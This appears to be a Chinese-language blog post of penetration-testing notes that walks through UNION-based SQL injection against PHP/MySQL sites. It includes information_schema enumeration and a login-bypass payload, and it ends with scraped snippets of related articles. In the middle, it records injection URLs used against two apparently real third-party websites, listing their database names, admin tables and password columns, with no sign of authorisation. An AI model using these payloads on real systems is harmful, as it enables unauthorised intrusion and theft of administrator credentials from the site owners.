渗透测试2

脚本语言-php语言基础补习(注释符,输入调试,接受处理)

sql语句补习(查询,插入,修改更新等)

实例编写sql注入测试页面

php+mysql注入(上)

如何查看是何种提交方式,在火狐浏览器中右键选择审查元素,在网络选项里即可显示。

若想防止SQL注入,即将对应语句改为下句

is_numeric是只允许输入数字

cmd调用数据库   show databases 显示数据库名

show  tables   显示表名

select * from 表名      显示该表中的数据

步骤

1.先找到带有参数的网页;

2.输入错误参数观察页面是否出错,若错误则有注入点

3.通过order语句折半猜字段

通过改变by后面的数字,找到零界点则为字段数

4.如果是asp注入则跳过这一步(因为ACCESS没有数据库名,可直接for admin 猜表名,而php注入先要爆出数据库名

(如果语句没有爆出错误,则改成

加上and 1=111等报错语句)

5.将报错的数字用

database() 数据库名

user() 数据库用户

version() 数据库版本

@@version_compile_os 服务器操作系统

这些替换进行查询

6.

先查询表名

查询information_schema数据库名下的表名tables的信息(条件:table_schema=0x726F6F74 数据库名为root)

information_schema.tables :information_schema数据库名下表名tables 记录所有数据库名下的所有表名信息的表

具体语句:http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=  0x726F6F74(这是数据库名的16进制转码)

参数:group_concat()  将所有表名爆出

接着查询列名

查询表名yzsoumember下的所有列名信息

information_schema.columns:记录所有数据库名下的所有列名信息的表

具体例子:http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name= 0x797A736F756D656D626572(这是表名的转码)

7.最后一步和asp注入相同,在知道表名和列名后,

输入语句进行爆出用户名和密码

access 数据层次

表名

列名

内容

mysql 数据层次

数据库名

表名

列名

内容

mysql

information_schema

root

yzsoumember

username,password

内容

区别:

asp+access

数据库存放在网站目录下(可以渗透访问),后缀格式mdb,asp,asa

php+mysql

数据库存储在数据库安装路径下(无法访问),后缀格式myi,myd,frm

.

asp+access注入属于暴力猜解注入

mysql5.0以上注入

information_schema:存储有所有数据库下的表名和列名信息

database() 数据库名

user() 数据库用户

version() 数据库版本

@@version_compile_os 服务器操作系统

windows 大小写不敏感

linux 大小写敏感

http://www.makita.com.cn

mutia0121

admin

name,adminpass

http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x6D7574696130313231

http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x61646D696E

http://www.wh3z.cn/

hdm1040458_db

intwho_admin_user

user_name,password

http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=0x68646D313034303435385F6462

http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=0x696E7477686F5F61646D696E5F75736572

1.两个站点操作

2.php页面编写

phpmyadmin

可通过在登陆提交栏输入特定SQL语句,来改变查询语句。

如输入:admin‘or 1=1)#

那么查询语句就成select user from php where (user=‘admin‘or 1=1)#‘) and (pw=‘$pass‘)        等于select user from php where (user=‘admin‘or 1=1)    因为#是注释符,后面的被省略

时间: 2024-10-12 05:43:22

渗透测试2的相关文章

手把手教你如何搭建自己的渗透测试环境

介绍 白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点.在目标不知情或者没得到授权的情况下发起黑客攻击是非法的.所以通常是建立一个自己的实验室,练习黑客技术. 在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术.我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试. 所需条件: VMware Workstation Windows XP系

网站渗透测试原理及详细过程

网站渗透测试原理及详细过程 渗透测试(Penetration Testing)目录 零.前言一.简介二.制定实施方案三.具体操作过程四.生成报告五.测试过程中的风险及规避参考资料FAQ集 零.前言 渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为. 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethical hacking),因此我们这里的所有读者应当都是Ethical Hackers,如果您还不是,那么我希望您到过这里后会成为他们中的

《Web渗透测试使用kali linux》pdf

下载地址:网盘下载 内容简介 <Web渗透测试:使用Kali Linux>是一本Web渗透测试实践指南,全面讲解如何使用Kali Linux对Web应用进行渗透测试.两位安全领域的专家站在攻击者的角度,一步步介绍了渗透测试基本概念.Kali Linux配置方式,带大家了解如何收集信息并发现攻击目标,然后利用各种漏洞发起攻击,并在此基础之上学会渗透测试,掌握补救易受攻击系统的具体技术.此外,书中还给出了撰写报告的最佳实践,其中一些范例可作为撰写可执行报告的模板. <Web渗透测试:使用Ka

60字节 - 无文件渗透测试实验

0x00 缘由 前几天看到文章<全球上百家银行和金融机构感染了一种"无文件"恶意程序,几乎无法检测>,希望自己能够亲手实验一下,以最大程度还原这种"无文件"攻击方式. 0x01 拓扑设计 192.168.1.0/24: 模拟公网环境 172.21.132.0/24: 模拟企业内网环境 192.168.1.108: 黑客 Kali 攻击机 192.168.1.212: 黑客 Windows 攻击机 边界 Web 服务器双网卡(公网的:192.168.1.1

小米范工具系列之十一:小米范渗透测试浏览器

小米范渗透测试浏览器是一款以chrome内核为基础,添加了一些渗透常用功能的浏览器. 主要功能包括: 1.自动修改http头(Host. Referer.Cookie.User-Agent); 2.POST提交. 3.请求拦截.修改. 4.代理快速切换. 5.网页URL提取. 6.端口扫描. 7.目录扫描. 8.basic认证破解. 9.表单认真破解(模拟浏览器操作.可绕过前端js加密.但速度慢.用于少量口令破解). 10.域名反查(调用爱站). 11.二级域名查询(调用netcraft). 1

渗透测试实践指南(1)

各种编码方案 base64 url html unicode 渗透测试实践指南(2016/1/14) 3.3 端口扫描 3.4 漏洞扫描 工具:Nessus 3.5 如何实战 4 漏洞利用 4.2 工具:Medusa(暴力破解,以破解ssh为例),Hydra 4.3 工具:Metasploit介绍使用 4.4 john the ripper 破解系统密码 (windows linux) 4.5 密码重置 4.6 嗅探网络流量 (受限于广播或hub) 4.7 macof:泛洪攻击交换机 工具集:D

Kali Linux Web 渗透测试— 第十二课-websploit

Kali Linux Web 渗透测试— 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试— 第十二课-websploit............................................... 1 Websploit 简介........................................................................................... 2 主要功能...........

shellKali Linux Web 渗透测试— 初级教程(第三课)

shellKali Linux Web 渗透测试— 初级教程(第三课) 文/玄魂 目录 shellKali Linux Web 渗透测试—初级教程(第三课)... 1 课程目录... 1 通过google hack寻找测试目标... 2 一个asp站点的sql注入... 3 一个php站点的sql注入... 4  课程地址:点击 课程目录 两个基本案例,以sql注入入手,目标为熟悉基本的思路,关注细节信息. 关于google hack,web 扫描,sql注入更详细和复杂的内容后续教程会专门讲解

渗透测试技术之本地文件包含

概述 通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞.在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞.此外,在本文中提到有一些技术,在CTF大赛中也经常被利用. 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器上的文件.当一个WEB应用程序在没有正确过滤输入数据的情况下,就有可能存在这个漏洞,该漏洞允许攻击者操纵输入数据.注入路径遍历字符.包含web服务器的其他

Web渗透测试使用Kali Linux(一)渗透测试概要及环境部署

渗透测试是利用已经发现的漏洞,采用恶意黑客的惯用手段来尝试对漏洞进行攻击. Kali Linux是BackTrack的进化版,是Linux的衍生版本,专门开发用作渗透测试,其中提供了很多的渗透测试工具. 结合白盒测试.黑盒测试.灰盒测试 Kali Linux测试一般步骤: 第一步,侦察 第二步,目录测试 第三步,漏洞利用 第四步,提升权限 第五步,保持访问 未完待续...